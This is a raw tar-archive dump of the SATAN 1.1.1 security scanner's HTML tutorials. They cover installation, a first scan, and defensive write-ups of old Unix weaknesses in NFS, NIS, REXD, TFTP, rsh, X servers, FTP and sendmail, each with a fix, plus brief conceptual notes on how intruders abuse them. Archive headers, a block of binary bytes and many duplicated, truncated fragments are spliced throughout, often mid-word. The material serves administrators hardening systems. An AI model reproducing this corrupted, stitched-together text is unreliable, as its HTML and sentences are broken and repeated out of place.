shell prompt: <p> <OL> <li> First, reconfigure the paths used by the programs by typing .<I>reconfig</I> in the main SATAN directory. <li> Then type <I> make</I> </OL> <p> That should be all that is needed. If you have any problems (remember, SATAN is currently only <I>fully</I> supported on SunOS 4.x and IRIX 5.x, although this will change by the final release), you should read the full documentation on <A HREF="../../docs/getting_started.html"> configuration and installation.</a> <p> You should now go to <A HREF="scanning.html"> Scanning your host or networks</a> to see how to start scanning hosts using SATAN. e <A HREF="../../docs/user_interface.html#tricky-implications"> Hints, Further tricky security implications, or Getting The Big Picture (tm)</A> Would be a <STRONG>very</STRONG> good idea. <hr> <a href=../../satan_dosatan-1.1.1/html/tutorials/first_time/scanning.html................................................. 600 . 465 . 506 . 3317 5737553437 15544. ............................................................................... ................................................................................................................................................................................................................................................................. ....................<title>Scanning for the first time with SATAN</title> <H1><IMG SRC="../../images/satan.gif"> Scanning for the first time with SATAN</H1> <HR> <p> To "scan", in SATAN-ese, means to probe or test a remote host's security. SATAN has the ability to scan a great number of hosts on a network; fortunately or unfortunately, you may not have the authority or permission to scan all of the hosts. SATAN should never be used to scan hosts that you haven't gotten explicit permission from the owner of the host that it is permissible to scan it. <p> <STRONG> Remember - you should run SATAN as "root"!</STRONG> <p> Assuming that you have the authority to do so, it is very simple to start scanning: <p> <OL> <li> From the control panel in the HTML interface, select .<I>Run SATAN</I>. It will prompt you with .<I>Primary target selection</I>; type in the host that you're .running SATAN from if it already isn't in the prompt box. <li> Select <I>Scan the target host only</I>, or, if you would prefer .and have the authorization and the time (it can take several minutes .to scan a single host at the higher scan levels), select .<I>Scan all hosts in the primary (i.e. the target's) subnet</I>. <li> Select a <I>Normal</I> scan to start out with. The more intensive .the scan the more time it takes to complete. <li> Select <I>Start the scan</I> to commence the scanning. </OL> <p> That's it! If you have any problems (remember, SATAN is currently only supported on SunOS 4.x and IRIX 5.x), you should read the full documentation on <A HREF="../../docs/getting_started.html"> using SATAN for the first time.</a> <p> You should now go to <A HREF="analyzing.html"> Analyzing the output</A> to see how to get and to interpret the results of your scan. ace, select <I>SATAN Reporting & Data Analysis</I>. You will then be prompted with a wealth of choices; when first learning to use the tool, the <I>Vulnerabilities</I> section will probably be the one of the most immediate interest. In that section, the <I>By Approximate Danger Level</I> link is a goodsatan-1.1.1/html/tutorials/vulnerability_tutorials.pl............................................... 600 . 465 . 506 . 1242 5737241027 16225. ................................................ ................................................................................................................................................................................................................................................................. ...................................................print CLIENT <<EOF; <HTML> <HEAD> <title> Tutorials - Security Problems </title> <LINK REV="made" HREF="mailto:satan\@fish.com"> </HEAD> <BODY> <H1><IMG SRC=$HTML_ROOT/images/satan.gif> Tutorials - Security problems </h1> <hr> <h2>Table of contents</h2> <ul> EOF foreach (<$html_root/tutorials/vulnerability/*.html>) { .s;.*/([^\/]+);\1;; .($_tutorial = $_) =~ s;([^\/]+).html;\1;; .$_tutorial =~ tr /_/ /; .print CLIENT <<EOF; .<p><dt> <IMG SRC=$HTML_ROOT/dots/blackdot.gif> .<a href=$HTML_ROOT/tutorials/vulnerability/$_> <strong>$_tutorial </strong></a> EOF } print CLIENT <<EOF; </ul> <hr> <a href=$HTML_STARTPAGE> Back to the SATAN start page </a> </BODY> </HTML> EOF <li> Select a <I>Normal</I> scan to start out with. The more intensive .the scan the more time it takes to complete. <li> Select <I>Start the scan</I> to commence the scanning. </OL> <p> That's it! If you have any problems (remember, SATAN is currently only supported on SunOS 4.x and IRIX 5.x), you should read the full documentation on <A HREF="satan-1.1.1/html/tutorials/vulnerability/........................................................... 700 . 465 . 506 . 0 5742521546 13477. ........................................................................... ................................................................................................................................................................................................................................................................. ........................satan-1.1.1/html/tutorials/vulnerability/NFS_export_to_unprivileged_programs.html................... 600 . 465 . 506 . 5372 5736744007 23705. ............................................................................. ................................................................................................................................................................................................................................................................. ......................<HTML> <HEAD> <TITLE>Tutorial - Unprivileged NFS access</TITLE> <LINK REV="made" HREF="mailto:satan@fish.com"> </HEAD> <BODY> <H1><IMG SRC="../../images/satan.gif">Unprivileged NFS access</H1> <HR> <H3>Summary</H3> NFS server executes requests from unprivileged user programs. <H3>Impact</H3> A malicious user can execute NFS file access requests on behalf of any user. <H3>Background</H3> When an NFS client host wants to access a remote file or directory, its operating system sends a request to the NFS server. The request specifies, among others, a file identifier, the operation (read, write, change permission, etc.), and the identity of the user on whose behalf the operation is to be done. <p> By default, the user identity is specified with the UNIX numeric user and group ids. With this scheme, also called AUTH_UNIX, the server simply believes anything that the client sends it. <H3>The problem</H3> An NFS request is nothing but a network message. Any user can run a program that generates arbitrary NFS requests. Such programs have been available for several years, and writing them does not require unusual programming skills. <p> When an NFS server accepts requests with AUTH_UNIX authentication from unprivileged user programs, a malicious user can execute file access requests on behalf of any user. Reason: with AUTH_UNIX authentication, the user identity is nothing but a few user and group ID numbers in a network message. <H3>Fix</H3> The fix is to avoid AUTH_UNIX authentication and to use something that involves cryptography. For example, secure NFS with DES or Kerberos credentials. Unfortunately, many NFS implementations support AUTH_UNIX authentication only. Consult your system documentation. <p> A partial, but more common, solution is to configure the NFS server, and where possible, the mount daemon, to accept requests only from privileged system programs (such as UNIX kernels), and to reject NFS requests that are sent by unprivileged user programs. <p> <ul> <li>SunOS 4 administrators modify <tt>/etc/rc.local</tt> <ul> <li><tt>rpc.mountd</tt> (no -n option) <li><tt>echo "nfs_portmon/W1" | adb -w /vmunix /dev/kmem</tt> </ul> <p> <li>SunOS 5 administrators modify <tt>/etc/system</tt> <ul> <li><tt>set nfs:nfs_portmon = 1</tt> </ul> </ul> <p> On other systems, the mountd command-line options differ, and the kernel variable may be called <em>nfsportmon</em> or something similar. <p> <strong>Note: rejecting NFS requests from unprivileged user programs does not protect your servers against malicious superusers or against malicious PC programs.</strong> <H3>Other tips</H3> <ul> <li>Where practical, export file systems read-only. <li>Consider blocking ports 2049 (nfs) and 111 (portmap) on your routers. </ul> </BODY> </HTML> ├±.W...▐Mÿ[╠ç▐÷─.¥ªqî+d.÷LM.«┬.+.ï╤┼≈2½▌.îo.î└σ¡╟ó╒r.w{-.G─.M.╢0%£.E>.H∙╟h.╗,µ..f╞%gSúB.Γâ.¼║C⌐Ωs├ê╚4/ Σ═╫\^┼ÑJ╙<+I╛H⌠]╗.╣¥⌡8]KmjJτ╓∞ß=╙╓╣«k6║.φß(lVτNw¼╧Vδ.╧╪ÿ╦¬╡÷C÷M┌.¬α╓-\σb·nOO|vUy≤O└°lI┼|çihM╡7∙Θß╢eëß╛8ß-╛≡É/.vE>ßûq╛ë..:▌.╛α▓╖v▌%ù=í║εUù═U┼╬┴á»TB.$┐ïíú┼▒;ƒ .╪satan-1.1.1/html/tutorials/vulnerability/NFS_export_via_portmapper.html............................. 600 . 465 . 506 . 4660 5736744007 21623. ................................................................................................... ................................................................................................................................................................................................................................................................. <HTML> <HEAD> <TITLE>Tutorial - Portmapper exports</TITLE> <LINK REV="made" HREF="mailto:satan@fish.com"> </HEAD> <BODY> <H1><IMG SRC="../../images/satan.gif">Portmapper exports</H1> <HR> <H3>Summary</H3> NFS file exports via the portmapper. <H3>Impact</H3> NFS export restrictions can be bypassed. <H3>Background</H3> In order to perform operations via the NFS network file system protocol, a client host sends NFS requests to the NFS server daemon with: <ul> <li>an NFS file handle that specifies the target of the operation, <li>the operation (lookup, read, write, change permissions), <li>the user on whose behalf the request is sent. </ul> When an NFS client host wants to access a remote file system for the first time, it first needs to obtain an NFS file handle. To this end, the client host sends an mount request to the server's mount daemon. The server's mount daemon verifies that the client host has permission to access the requested file system. When the mount daemon grants access, it sends a (directory) file handle back to the NFS client. <H3>The problem</H3> For efficiency reasons, most NFS export restrictions are enforced by the mount daemon. Individual file access operations are handled by the NFS daemon, and the origin of such requests is examined only in special cases such as remote superuser access. <p> Instead of talking directly to the mount daemon, a malicious NFS client can ask the server's portmapper daemon to forward the request to the mount daemon. When the mount daemon receives the request from the portmapper, the mount daemon will believe that the request comes from the file server, and not from the malicious client. <p> When the file server exports file systems to itself (for example, because the server is a netgroup member) the mount daemon grants access and replies with a file handle. The portmapper forwards the handle to the malicious client. From now on, the client can talk directly to the server's NFS daemon to access the directory and all files below it. <H3>Fix</H3> Run a portmapper (or rpcbind program in case of System V.4) that does not forward mount etc. requests. Consult your vendor's patch list. See also: <a href="ftp://ftp.cert.org/pub/cert_advisories/CA-94:15.NFS.Vulnerabilities"> Cert Advisory 94:15</a>. <H3>Other tips</H3> <ul> <li>Export file systems read-only where possible. <li>Consider blocking ports 2049 (nfs) and 111 (portmap) on your routers. </ul> </BODY> </HTML> re sent by unprivileged user programs. <p> <ul> <li>SunOS 4 administrators mosatan-1.1.1/html/tutorials/vulnerability/NIS_password_file_access.html.............................. 600 . 465 . 506 . 4750 5736744010 21351. ........................................................................ ................................................................................................................................................................................................................................................................. ...........................<HTML> <HEAD> <TITLE>Tutorial - NIS password file access</TITLE> <LINK REV="made" HREF="mailto:satan@fish.com"> </HEAD> <BODY> <H1><IMG SRC="../../images/satan.gif">NIS password file access</H1> <HR> <H3>Summary</H3> NIS password file access by arbitrary hosts. <H3>Impact</H3> Allows automated password guessing attacks. <H3>Background</H3> The NIS (Network Information Service) implements network-wide access to administrative information. Examples of databases (also called NIS maps) that are shared via NIS: <ul> <li>the password file that describes what users have access to the system, <li>the table with names and addresses of hosts on the network, <li>electronic mail aliases. </ul> NIS databases are organized in domains. One NIS server can serve multiple NIS domains. In order to perform a query, a client sends a request to a NIS server and specifies <ul> <li>a NIS domain name, <li>the name of the database (NIS map) to be searched, <li>a search key. </ul> <H3>The problem</H3> Many NIS implementations provide no access control. Every host that asks for information will receive a reply. In order to perform a query, one needs to know the server's NIS domain name. Often, this name is easy to guess, or it can be obtained via the <em>bootparam</em> network service. <p> When the local network is accessible from other networks, a remote intruder can collect password file information and run a password guessing program. Many people (including <a href="ftp://coast.cs.purdue.edu/pub/doc/passwords/Dan_Klein_password.ps.Z"> Dan Klein</a>) have demonstrated that people tend to choose passwords that are easy to guess. <H3>Fix</H3> <ul> <li>Several vendors have added access control to their <em> ypserv</em> implementation. Check your system documentation or vendor patch list. The control file is sometimes called <em>securenets</em>. </ul> <H3>Workarounds</H3> <ul> <li>Run a <a href="ftp://ftp.win.tue.nl/pub/security/index.html">portmapper </a>with access control. </ul> <H3>Other tips</H3> <ul> <li>Consider blocking ports 111 (portmap) on your network gateway. This makes attacks on NIS and NFS mount daemons much harder. <li>Enforce a policy for choosing passwords by installing an alternative <em>passwd</em> command, for example <a href="ftp://coast.cs.purdue.edu/pub/tools/unix/anlpasswd">anlpasswd</a>. <li>See the <a href="../../docs/admin_guide_to_cracking.html#nis-passwords">Admin Guide to Cracking</a> for an example of why this is a problem. </ul> </BODY> </HTML> e problem</H3> Many NISsatan-1.1.1/html/tutorials/vulnerability/REXD_access.html........................................... 600 . 465 . 506 . 3100 5736744010 16525. ............................................................................................. ................................................................................................................................................................................................................................................................. ......<HTML> <HEAD> <TITLE>Tutorial - REXD access</TITLE> <LINK REV="made" HREF="mailto:satan@fish.com"> </HEAD> <BODY> <H1><IMG SRC="../../images/satan.gif">REXD access</H1> <HR> <H3>Summary</H3> REXD remote access from arbitrary hosts. <H3>Impact</H3> A remote intruder can execute commands as any user. <H3>Background</H3> The <em>rexd</em> service and the <em>on</em> client program implement remote command execution via the network. To the extent that it is possible, the complete client environment, including working directory and environment variables, is made available on the remote system. <H3>The problem</H3> A request for remote command execution contains, among others, the command to be executed, and a user and group id. By default, the rexd server believes everything that the client sends it. An intruder can exploit the service to execute commands as any user (except perhaps <em>root</em>). The typical rexd server has no protection against abuse: most implementations have no provision for access control, nor do they require that the client uses a privileged network port. <H3>Fix</H3> <ul> <li>Disable the rexd service. Usually this is accomplished by editing the <em>inetd.conf</em> file, and by sending a HUP signal to the <em> inetd</em> process. <li>Some rexd implementations can be configured to use a more secure protocol. Consult your manual pages for details. </ul> <H3>Other tips</H3> <ul> <li>See the <a href="../../docs/admin_guide_to_cracking.html#rexd">Admin Guide to Cracking</a> for an example of why this is a problem. </ul> </BODY> </HTML> that does not forward mount etc. requests. Consult your vendor's patch list. See also: <a href="ftp://ftp.cert.org/pub/cert_advisories/CA-94:15.NFS.Vulnerabilities"> Cert Advisory 94:15</a>. <H3>Other tips</H3> <ul> <li>Export file systems read-only where possible. <li>Consider blocking ports 2049 (nfs) and 111 (portmap) on your routers. </ul> </BODY> </HTML> re sent by unprivileged user programs. <p> <ul> <li>SunOS 4 administrators mosatan-1.1.1/html/tutorials/vulnerability/TFTP_file_access.html...................................... 600 . 465 . 506 . 2277 5736744010 17555. ........................................................................ ................................................................................................................................................................................................................................................................. ...........................<HTML> <HEAD> <TITLE>Tutorial - TFTP file access</TITLE> <LINK REV="made" HREF="mailto:satan@fish.com"> </HEAD> <BODY> <H1><IMG SRC="../../images/satan.gif">TFTP file access</H1> <HR> <H3>Summary</H3> File access via the TFTP service. <H3>Impact</H3> Unauthorized remote access to system or user files. <H3>Background</H3> The TFTP (trivial file transfer protocol) service provides remote access to files, without asking for a password. It is typically used for the initialization of diskless computers, of X terminals, or of other dedicated hardware. <H3>The problem</H3> When the TFTP daemon does not limit access to specific files or hosts, a remote intruder can use the service to obtain copies of the password file or of other system or user files, or to remotely overwrite files. <H3>Fix</H3> <ul> <li>Restrict TFTP access to only limited subtree of the file system. Consult your tftpd manual pages for details. <li>When no access restriction is possible, restrict TFTP access by using a tcp wrapper. </ul> <H3>Other tips</H3> <ul> <li>See the <a href="../../docs/admin_guide_to_cracking.html#tftp">Admin Guide to Cracking</a> for an example of why this is a problem. </ul> </BODY> </HTML> /em> file, and by sending a HUP signal to the <em> inetd</em> process. <li>Some rexd implementations can be configured to use a more secure protocol. Consult your manual pages for details. </ul> <H3>Other tips</H3> <ul> <li>See the <a href="../../docs/admin_guide_to_cracking.html#rexd">Admin Guide to Cracking</a> satan-1.1.1/html/tutorials/vulnerability/remote_shell_access.html................................... 600 . 465 . 506 . 3033 5736744011 20453. ............................................................................... ................................................................................................................................................................................................................................................................. ....................<HTML> <HEAD> <TITLE>Tutorial - remote shell access</TITLE> <LINK REV="made" HREF="mailto:satan@fish.com"> </HEAD> <BODY> <H1><IMG SRC="../../images/satan.gif">Remote shell access</H1> <HR> <H3>Summary</H3> Remote shell/remote login access from arbitrary hosts. <H3>Impact</H3> The machine can be taken over by any malicious (super)user on the network. <H3>The problem</H3> When the remote login/remote shell service trusts every host on the network, a malicious superuser on an arbitrary host can gain access as any user (except perhaps <em>root</em>). Once inside, the intruder can replace system programs or configuration files (such as the password file) and take over the machine. <p> In addition, there are guest or administrative accounts that might not have passwords protecting the account, which allows anyone to remotely login as that user and gain access to the host. <H3>Fix</H3> Remove the wildcard (+) from the /etc/hosts.equiv file. Be careful with the use of the <tt>-@group</tt> netgroup feature, as there are many incorrect implementations. <p> Delete or disable any accounts without a password from the system or NIS password file. <H3>Other tips</H3> <ul> <li> Give system accounts such as <em>bin</em> and <em> daemon</em> a non-functional shell (such as <em>/bin/false</em>) and put them in the <em>/etc/ftpusers</em> file so they cannot use ftp. <li>See the <a href="../../docs/admin_guide_to_cracking.html#remote-shell-access">Admin Guide to Cracking</a> for an example of why this is a problem. </ul> </BODY> </HTML> is a problem. </ul> </BODY> </HTML> that does not forward mount etc. requests. Consult your vendor's patch list. See also: <a href="ftp://ftp.cert.org/pub/cert_advisories/CA-94:15.NFS.Vulnerabilities"> Cert Advisory 94:15</a>. <H3>Other tips</H3> <ul> <li>Export file systems read-only where possible. <li>Consider blocking ports 2049 (nfs) and 111 (portmap) on your routers. </ul> </BODY> </HTML> re sent by unprivileged user programs. <p> <ul> <li>SunOS 4 administrators mosatan-1.1.1/html/tutorials/vulnerability/unrestricted_NFS_export.html............................... 600 . 465 . 506 . 3226 5736744011 21276. ........................................................................ ................................................................................................................................................................................................................................................................. ...........................<HTML> <HEAD> <TITLE>Tutorial - Unrestricted NFS export</TITLE> <LINK REV="made" HREF="mailto:satan@fish.com"> </HEAD> <BODY> <H1><IMG SRC="../../images/satan.gif">Unrestricted NFS export</H1> <HR> <H3>Summary</H3> File systems exported via NFS to arbitrary hosts. <H3>Impact</H3> Unauthorized remote access to system and/or user files. <H3>The problem</H3> When a file system is exported without restriction, an intruder can remotely compromise user or system files, and then take over the machine. Examples: <ul> <li>An intruder can remotely replace a system program or configuration file. </ul> UNIX-specific examples: <ul> <li>An intruder can remotely install a <em> .rhosts</em> file to obtain interactive access. <li>An intruder can remotely install a <em> .forward</em> file to obtain non-interactive access. </ul> <H3>Fix</H3> <ul> <li>Make sure all file exports specify an explicit list of clients or netgroups. <li>Export file systems read-only where possible. </ul> <H3>Other tips</H3> <ul> <li>Some versions of the NFS mount daemon cannot expand large netgroups and will export to the world anyway; see also <a href="ftp://ftp.cert.org:/pub/cert_advisories/CA-94:02.REVISED.SunOS.rpc.mountd.vulnerability"> Cert advisory CA-94:02</a>. Check your vendor patch list. <li>In NIS netgroup members, empty host fields are treated as wildcards and cause the mount daemon to grant access to any host. <li>Consider blocking ports 2049 (nfs) and 111 (portmap) on your routers. <li>See the <a href="../../docs/admin_guide_to_cracking.html#unrestricted-NFS-export">Admin Guide to Cracking</a> for an example of why this is a problem. </ul> </BODY> </HTML> <a href="ftp://ftp.cert.org/pub/cert_advisories/CA-94:15.NFS.Vulnerabilities"> Cert Advisory 94:15</a>. <H3>Other tips</H3> <ul> <li>Export file systems read-only where possible. <li>Consider blocking ports 2049 (nfs) and 111 (portmap) on your routers. </ul> </BODY> </HTML> re sent by unprivileged user programs. <p> <ul> <li>SunOS 4 administrators mosatan-1.1.1/html/tutorials/vulnerability/unrestricted_X_server_access.html.......................... 600 . 465 . 506 . 3657 5736744011 22375. ........................................................................ ................................................................................................................................................................................................................................................................. ...........................<HTML> <HEAD> <TITLE>Tutorial - X server access</TITLE> <LINK REV="made" HREF="mailto:satan@fish.com"> </HEAD> <BODY> <H1><IMG SRC="../../images/satan.gif"> X server access</H1> <HR> <H3>Summary</H3> X server access from arbitrary hosts. <H3>Impact</H3> A remote intruder can control the keyboard, mouse and screen. <H3>Background</H3> The X Window system implements an environment where applications use the network to interact with a user workstation's display, keyboard and mouse. There are two classes of programs: <ul> <li>The X server: the program that manages the user's workstation display and input devices. <li>X clients: the applications that run on the user's workstation or elsewhere in the network. </ul> <H3>The problem</H3> When the X server permits access from arbitrary hosts on the network, a remote intruder can connect to the X server and: <ul> <li>Read the user's keyboard, including any passwords that the user types, <li>Read everything that is sent to the screen, <li>Write arbitrary information to the screen, <li>Start or terminate arbitrary applications, <li>Take control of the user's session. </ul> <H3>Fix</H3> Remove all instances of the <em> xhost +</em> command from the system-wide <em> Xsession</em> file, from user <em> .xsession</em> files, and from any application programs or shell scripts that use the X window system. </ul> <H3>Other tips</H3> <ul> <li>Use the X magic cookie mechanism or equivalent. With logins under control of <em> xdm</em>, you turn on authentication by editing the <em> xdm-config</em> file and setting <em> the DisplayManager*authorize</em> attribute to <em> true</em>. <li>When granting access to the screen from another machine, use the <em> xauth</em> command in preference to the <em> xhost</em> command. <li>See the <a href="../../docs/admin_guide_to_cracking.html#x-access">Admin Guide to Cracking</a> for an example of why this is a problem. </ul> </BODY> </HTML> e user types, <li>Read everything that is sent to the screen, <li>Write arbitrasatan-1.1.1/html/tutorials/vulnerability/writable_FTP_home_directory.html........................... 600 . 465 . 506 . 2650 5737214556 22101. .................................................................................... ................................................................................................................................................................................................................................................................. ...............<HTML> <HEAD> <TITLE>Tutorial - writable FTP home directory</TITLE> <LINK REV="made" HREF="mailto:satan@fish.com"> </HEAD> <BODY> <H1><IMG SRC="../../images/satan.gif">Writable FTP home directory</H1> <HR> <H3>Summary</H3> FTP home directory is writable for anonymous users. <H3>Impact</H3> Remote command execution, remote file substitution. <H3>The problem</H3> When the FTP home directory of a UNIX host is writable, a remote intruder can upload a <em>.rhosts</em> or <em>.forward</em> file to gain access to the system, or may be able to replace files. <p> When a PC (DOS or MAC) permits anonymous users write access to its file system, a remote intruder may be able replace arbitrary programs or configuration files, or corrupt the file system by filling it up. <H3>Fix (UNIX)</H3> <ul> <li>Make sure that the FTP home directory, and all system files and directories below it, are owned by <em>root</em>. <li>Make sure that they are not writable by anonymous users. As a rule, no file or directory should be owned by the FTP account. </ul> <H3>Other tips (UNIX)</H3> <ul> <li>Change the login shell of the ftp account to <tt>/bin/false</tt>. <li>See the <a href="../../docs/admin_guide_to_cracking.html#writable-ftp"> Admin Guide to Cracking</a> for an example of why this is a problem. <li><a href="ftp://ftp.cert.org/pub/tech_tips/anonymous_ftp">CERT/CC Anomymous FTP configuration guidelines</a>. </ul> </BODY> </HTML> ocking ports 2049 (nfs) and 111 (portmap) on your routers. <li>See the <a href="../../dsatan-1.1.1/html/tutorials/vulnerability/Sendmail_vulnerabilities.html.............................. 600 . 465 . 506 . 3172 5737737655 21512. ..................................................................................... ................................................................................................................................................................................................................................................................. ..............<HTML> <HEAD> <TITLE>Tutorial - Sendmail vulnerabilities</TITLE> <LINK REV="made" HREF="mailto:satan@fish.com"> </HEAD> <BODY> <H1><IMG SRC="../../images/satan.gif">Sendmail vulnerabilities</H1> <HR> <H3>Summary</H3> Assorted sendmail vulnerabilities. <H3>The problems</H3> Note: this text was adapted from <a href="ftp://ftp.cert.org/pub/cert_advisories/CA-95:05.sendmail.vulnerabilities"> Cert Advisory CA-95:05</a> of February 22, 1995. <p> With almost every sendmail version that was built before February 1995, a malicious user can gain unauthorized privileges by exploiting newlines in command-line arguments or in the process environment. Intruders need to have access to an account on your system to exploit this problem. <p> In addition, pre-8.6.10 versions of sendmail that support IDENT (RFC 1413) functionality have a problem that could allow an intruder to gain unauthorized access to your system remotely (that is, without having access to an account on the system). <H3>Fix</H3> <ul> <li>Replace sendmail by a more recent version, for example from <a href="ftp://ftp.cs.berkeley.edu/ucb/sendmail"> ftp.cs.berkeley.edu:/ucb/sendmail</a>, or use a corrected version from your vendor. <li>Contact your vendor for information on how to get the latest fixed/patched versions of sendmail. <li>Consult <a href="ftp://ftp.cert.org/pub/cert_advisories/CA-95:05.sendmail.vulnerabilities"> Cert Advisory CA-95:05</a> for more information. </ul> <H3>Other tips</H3> <ul> <li>See the <a href="../../docs/admin_guide_to_cracking.html#sendmail">Admin Guide to Cracking</a> for an example of why this is a problem. </ul> </BODY> </HTML> t>/bin/false</tt>. <li>See the <a href="../../docs/admin_guide_to_cracking.html#writable-ftp"> Admin Guide to Cracking</a> for an example of why this is a problem. <li><a href="ftp://ftp.cert.org/pub/tech_tips/anonymous_ftp">CERT/CC Anomymous FTP configuration guidelines</a>. </ul> </BODY> </HTML> ocking ports 2049 (nfs) and 111 (portmap) on your routers. <li>See the <a href="../../dsatan-1.1.1/html/tutorials/vulnerability/FTP_vulnerabilities.html................................... 600 . 465 . 506 . 3111 5736744006 20363. ..................................................................................... ................................................................................................................................................................................................................................................................. ..............<HTML> <HEAD> <TITLE>Tutorial - WU-FTPD Vulnerability</TITLE> <LINK REV="made" HREF="mailto:satan@fish.com"> </HEAD> <BODY> <H1><IMG SRC="../../images/satan.gif">WU-FTPD Vulnerability</H1> <HR> <H3>Summary</H3> Root access via the wuarchive FTPD server. <H3>Impact</H3> Unauthorized remote root access to system. <H3>Background</H3> The wuarchive FTPD daemon (or WU-FTPD) is a highly modified version (and significantly larger) version of FTPD that provides extra logging, limited remote command support, and other features to the standard BSD version of FTPD. The additional code adds greatly to the complexity, and multiple significant software bugs have been found in it. <H3>The problem</H3> There is a race condition in the code, as well as a bug in the <i>SITE EXEC</i> command, that allows anyone (remote or local) root access on a host running a vulnerable FTPD daemon. Support for anonymous FTP is not required to exploit this vulnerability. <H3>Fix</H3> <ul> <li> Don't use extended or modified FTPD daemons unless they are necessary - venders code is typically more stable and secure. <li> Upgrade to a more recent version of WU-FTPD; it can be found at the <a href="ftp://wuarchive.wustl.edu/packages/wuarchive-ftpd"> wuarchive ftp site</a>. <li> Restrict FTP access by using a tcp wrapper. </ul> <H3>See also</H3> <ul> <li> <a href="ftp://ftp.cert.org/pub/cert_advisories/CA-93:06.wuarchive.ftpd.vulnerability"> Cert Advisory 93:06</a>. <li> <a href="ftp://ftp.cert.org/pub/cert_advisories/CA-94:07.wuarchive.ftpd.trojan.horse"> Cert Advisory 94:07</a>. </ul> </BODY> </HTML> Cracking</a> for an example of why this is a problem. </ul> </BODY> </HTML> <a href="ftp://ftp.cert.org/pub/cert_advisories/CA-94:15.NFS.Vulnerabilities"> Cert Advisory 94:15</a>. <H3>Other tips</H3> <ul> <li>Export file systems read-only where possible. <li>Consider blocking ports 2049 (nfs) and 111 (portmap) on your routers. </ul> </BODY> </HTML> re sent by unprivileged user programs. <p> <ul> <li>SunOS 4 administrators mosatan-1.1.1/html/tutorials/vulnerability/unrestricted_modem.html.................................... 600 . 465 . 506 . 2104 5736744012 20343. ........................................................................ ................................................................................................................................................................................................................................................................. ...........................<HTML> <HEAD> <TITLE>Tutorial - Unrestricted Modem on the Internet</TITLE> <LINK REV="made" HREF="mailto:satan@fish.com"> </HEAD> <BODY> <H1><IMG SRC="../../images/satan.gif"> Unrestricted Modem on the Internet</H1> <HR> <H3>Summary</H3> A live and potentially unrestricted modem has been detected. <H3>Impact</H3> A remote intruder can anonymously dial anywhere that the phone can call. <H3>Background</H3> In the past, dialout modems were often placed unprotected on one of a UN*X host's TCP ports to facilitate their use. With the advent of special purpose hardware with built-in protection facilities, as well as extra authentication methods such as S/Key and digital tokens, there is little reason to do this. <H3>The problem</H3> Anyone can use the modem to dial anywhere, enabling them to attack random targets and incurring you a potentially large phone bill. <H3>Fix</H3> Disallow unprotected Internet access of the modem by placing it behind a firewall or putting password or other extra authentication methods on it (such as S/Key or digital tokens.) </BODY> </HTML> table and secure. <li> Upgrade to a more recent version of WU-FTPD; it can be found at the <a href="ftp://wuarchive.wustl.edu/packages/wuarchive-ftpd"> wuarchive ftp site</a>. <li> Restrict FTP access by using a tcp wrapper. </ul> <H3>See also</H3> <ul> <li> <a href="ftp://ftp.cert.org/pub/cert_advisories/CA-93:06.wuarchive.ftpd.vulnerability"> Cert Advisory 93:06</a>. <li> <a href="ftp://ftp.cert.org/pub/cert_advisories/CA-94:07.wuarsatan-1.1.1/html/tutorials/vulnerability/SATAN_password_disclosure.html............................. 600 . 465 . 506 . 13617 5742435023 21522. ................................... ................................................................................................................................................................................................................................................................. ................................................................<HTML> <HEAD> <title>SATAN Password Disclosure</title> <LINK REV="made" HREF="mailto:satan@fish.com"> </HEAD> <BODY> <H1> <IMG SRC="../../images/satan.gif">SATAN Password Disclosure</H1> <HR> <H3>Summary</H3> SATAN password disclosure via flawed HTML clients or environmental problems <H3>Impact</H3> Unauthorized users may execute commands through SATAN <H3>Background</H3> By default, SATAN runs as a custom HTML (hypertext markup language) server, executing requests from a user-provided HTML browser, or client program. Examples of common HTML clients are <i>Netscape, NCSA Mosaic</i> and <i>Lynx</i>. <p> An HTML client request is nothing but a network message, and network messages may be sent by any user on the network. To defend itself against requests from unauthorized users, SATAN takes the following precautions: <ul> <li>SATAN generates a <i>session key</i>, to be used as a secret password, each time it starts up an HTML client. The session key is in the form of a 32-byte quasi-random number. The number is called <i>quasi-random</i> because it is impossible to generate real random numbers using only software. <p> <li>SATAN creates HTML files with the secret password embedded in URL (uniform resource locator) links. The HTML file access permissions are restricted to the owner of the SATAN process (and the superuser). <p> <li>SATAN rejects HTML requests whose URL does not contain the current SATAN password. This requirement prevents access by unauthorized clients, provided that the current SATAN password is kept secret. </ul> The protection scheme used by SATAN is in essence the same as the scheme used by many implementations of the X Window system: MIT magic cookies. These secrets are normally kept in the user's home directory, in a file called <i>.Xauthority</i>. Before it is granted access to the screen, keyboard and mouse, an X client program needs to prove that it is authorized, by handing over the correct magic cookie. This requirement prevents unauthorized access, provided that the magic cookie information is kept secret. <H3>The problem</H3> It is important that the current SATAN password is kept secret. When the password leaks out, unauthorized users can send commands to the SATAN HTML server where the commands will be executed with the privileges of the SATAN process. <p> Note that SATAN generates a new password <i>everytime</i> you start it up under an HTML client, so if you are suspicious, simply restart the program. <p> SATAN never sends its current password over the network. However, the password, or parts of it, may be disclosed due to flaws in HTML clients or due to weak protection of the environment that SATAN is running in. One possible scenario for disclosure is: <ul> <li>When the user selects other HTML servers from within a SATAN session, some HTML client programs (<i>Netscape</i> and <i>Lynx</i>) disclose the current SATAN URL, including SATAN password information. The intention of this feature is to help service providers find out the structure of the world-wide web. However, the feature can also reveal confidential information. With version 1.1 and later, SATAN displays a warning when the HTML client program exhibits this questionable (i.e. stupid) feature. </ul> Other scenarios for SATAN password disclosure are discussed in the next section, as part of a list of counter measures. <H3>Preventing SATAN password disclosure</H3> The security of SATAN is highly dependent on the security of environment that it runs in. In the case of an X Window environment: <ul> <li>Avoid using the <i>xhost</i> mechanism, but use <i>xauth</i> and MIT magic cookies or better. Otherwise, unauthorized users can see and manipulate everything that happens with the screen, keyboard and mouse. Of course, this can also be a problem when you are not running the SATAN program at all. </ul> Steps that can help to keep the X magic cookie information secret: <ul> <li>Avoid sharing your home directory, including <i>.Xauthority</i> file, with other hosts. Otherwise, X magic cookie information may be captured from the network while the X software accesses that file, so that unauthorized users can take over the screen, keyboard and mouse. <p> <li>Avoid running X applications with output to a remote display. Otherwise, X magic cookie information can be captured from the network while X clients connect to the remote display, so that unauthorized users can take over the screen, keyboard and mouse. </ul> Finally, steps that can help to keep the current SATAN password secret: <ul> <li>Avoid sharing the SATAN directories with other hosts. Otherwise, SATAN password information may be captured from the network while the HTML software accesses passworded files, so that unauthorized users can take over the SATAN HTML server. <p> <li>Avoid running SATAN with output to a remote display. Otherwise, SATAN password information can be captured from the network while URL information is shown on the remote display, so that unauthorized users can take over the SATAN HTML server. </ul> <H3>Additional SATAN defenses</H3> The SATAN software spends a lot of effort to protect your computer 